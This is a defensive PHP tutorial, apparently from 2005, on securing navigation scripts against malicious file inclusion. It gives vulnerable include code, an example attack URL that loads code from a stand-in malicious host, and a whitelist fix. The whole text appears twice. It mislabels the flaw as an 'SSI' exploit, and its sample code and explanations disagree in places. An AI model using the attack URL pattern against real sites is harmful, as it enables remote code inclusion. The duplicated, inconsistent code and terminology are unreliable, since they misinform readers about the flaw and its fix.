Resources
In the following tutorial I will explain how to code and understand a more secure navigation script. I am sure you have seen other navigation scripts the difference is those scripts open a security hole on your site, an SSI (Server Side Include) Exploit to be exact.
Here is an example of the dangerous code
<?php
if(!isset($_GET['url']))
{
$url = 'home';
}
else
{
include ($url . "php");
}
?>
The above code is saying if the variable "url" is set, include the page or include the predefined page. Now it seems like this is pretty secure, but someone would be able to include a malicious file.
Here is an example url: www.your navscript.com/index.php?url=http://www.maliciouscodesite.com/badcode
This would include the malicious code and your site would append the "php" extension to the include link.
I am sure you can see the problems with this result?
Here is the more secure option
$default = "home.php";
$allowed = array (
'index',
'example',
);
if( isset( $_POST['P'] ) || isset( $_GET['P'] ))
{
$page = ($_POST['P']) ? $_POST['P'] : $_GET['P'];
if( in_array( trim ( $page ), $allowed ))
{
$file = $page . ".php";
if( (file_exists( $file )))
{
include( $file );
}
else
{
include( $default );
}
}
else
{
include( $default );
}
}
else
{
include( $default );
}
$default = "home.php";
The default page that is included.
$allowed = array (
'index',
'example',
);
This is the Array of allowed folders, add as many as you need.
if( isset( $_POST['P'] ) || isset( $_GET['P'] ))
{
If the "P" variable is set then continue with script, if it is false then include the default page.
$page = ($_POST['P']) ? $_POST['P'] : $_GET['P'];
Checks to see if the "P" variable has a value. If it does that value is set to the "$page" variable
if( in_array( trim ( $page ), $allowed ))
{
Check to see whether or not the value set in "$page" is in the list of "$allowed" Array. The "trim" part removes extra spaces that might exist in the array.
$file = $_GET['P'] . ".php";
Sets the value of $file to the filename you are requesting and appends the ".php" extension.
if( (file_exists( $file )))
{
include( $file );
}
If the file exists then include the file( "$file" ).
else
{
include( $default );
}
If the file is in the Array, but the file is not found include the default file.
else
{
include( $default );
}
}
If the file requested doesn't exist in the Array include the default file.
else
{
include( $default );
}
If no request for a page is made include the default one.
That is the end of the script. Now you have created a more secure alternative for a site with PHP navigation. Just fill in the array with your files and you are ready to go. If you wanted to add to the script you could add a file type checker as well.
<strong>Updates:</strong>
<em>[Mon Sep 5, 2005 02:38 PM]</em> One of the readers notified me of a bug in the script where it sets the page variable to "1". If you were using this script and couldn't get it to work this is most likely the reason why.
If you have questions or comments please feel free to contact me: matt[@]mkeefedesign.com ( remove the "[" & "]" )
Here is an example of the dangerous code
<?php
if(!isset($_GET['url']))
{
$url = 'home';
}
else
{
include ($url . "php");
}
?>
The above code is saying if the variable "url" is set, include the page or include the predefined page. Now it seems like this is pretty secure, but someone would be able to include a malicious file.
Here is an example url: www.your navscript.com/index.php?url=http://www.maliciouscodesite.com/badcode
This would include the malicious code and your site would append the "php" extension to the include link.
I am sure you can see the problems with this result?
Here is the more secure option
$default = "home.php";
$allowed = array (
'index',
'example',
);
if( isset( $_POST['P'] ) || isset( $_GET['P'] ))
{
$page = ($_POST['P']) ? $_POST['P'] : $_GET['P'];
if( in_array( trim ( $page ), $allowed ))
{
$file = $page . ".php";
if( (file_exists( $file )))
{
include( $file );
}
else
{
include( $default );
}
}
else
{
include( $default );
}
}
else
{
include( $default );
}
$default = "home.php";
The default page that is included.
$allowed = array (
'index',
'example',
);
This is the Array of allowed folders, add as many as you need.
if( isset( $_POST['P'] ) || isset( $_GET['P'] ))
{
If the "P" variable is set then continue with script, if it is false then include the default page.
$page = ($_POST['P']) ? $_POST['P'] : $_GET['P'];
Checks to see if the "P" variable has a value. If it does that value is set to the "$page" variable
if( in_array( trim ( $page ), $allowed ))
{
Check to see whether or not the value set in "$page" is in the list of "$allowed" Array. The "trim" part removes extra spaces that might exist in the array.
$file = $_GET['P'] . ".php";
Sets the value of $file to the filename you are requesting and appends the ".php" extension.
if( (file_exists( $file )))
{
include( $file );
}
If the file exists then include the file( "$file" ).
else
{
include( $default );
}
If the file is in the Array, but the file is not found include the default file.
else
{
include( $default );
}
}
If the file requested doesn't exist in the Array include the default file.
else
{
include( $default );
}
If no request for a page is made include the default one.
That is the end of the script. Now you have created a more secure alternative for a site with PHP navigation. Just fill in the array with your files and you are ready to go. If you wanted to add to the script you could add a file type checker as well.
<strong>Updates:</strong>
<em>[Mon Sep 5, 2005 02:38 PM]</em> One of the readers notified me of a bug in the script where it sets the page variable to "1". If you were using this script and couldn't get it to work this is most likely the reason why.
If you have questions or comments please feel free to contact me: matt[@]mkeefedesign.com ( remove the "[" & "]" )
